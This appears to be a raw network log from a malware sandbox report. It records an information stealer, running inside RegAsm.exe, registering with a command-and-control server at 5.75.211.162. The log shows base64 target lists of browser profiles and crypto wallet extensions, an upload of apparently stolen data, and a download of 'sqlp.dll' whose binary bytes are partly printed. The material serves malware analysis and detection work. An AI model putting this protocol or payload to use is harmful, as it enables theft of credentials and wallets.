2024-09-26 18:15:38 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 18:15:38 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49758	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:39 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49759	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:40 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:40 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 31 43 43 39 30 31 44 30 42 41 31 39 30 34 36 36 35 39 35 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 2d 2d 0d Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="hwid"691CC901D0BA1904665954-a33c7340-61ca------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IIJDBGDGCGDAKFIDGIDB--
2024-09-26 18:15:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:41 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|e603b1e81257d2ce86a8fd6ec4fafc36\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49760	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:42 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:42 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="token"e603b1e81257d2ce86a8fd6ec4fafc36------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AKJDGDGDHDGDBFIDHDBACont
2024-09-26 18:15:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:43 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49761	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:43 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:43 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"e603b1e81257d2ce86a8fd6ec4fafc36------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JKJDAEBFCBKECBGDBFCFCont
2024-09-26 18:15:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:44 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49762	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:45 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:45 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"e603b1e81257d2ce86a8fd6ec4fafc36------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AFCFHJJECAEHJJKEHIDBCont
2024-09-26 18:15:45 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:45 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49763	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:46 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 5637 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:46 UTC	5637	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 30 33 62 31 65 38 31 32 35 37 64 32 63 65 38 36 61 38 66 64 36 65 63 34 66 61 66 63 33 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 49 4a 4b 4a 4b 46 49 44 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="token"e603b1e81257d2ce86a8fd6ec4fafc36------ECFHIJKJKFIDHJKFBGHCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------ECFHIJKJKFIDHJKFBGHCCont
2024-09-26 18:15:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 18:15:47 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49764	5.75.211.162	443	6696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:15:47 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:15:47 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:15:47 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:15:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:15:47 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 18:15:47 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 18:15:47 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 18:15:47 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 18:15:48 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 18:15:48 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 18:15:48 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
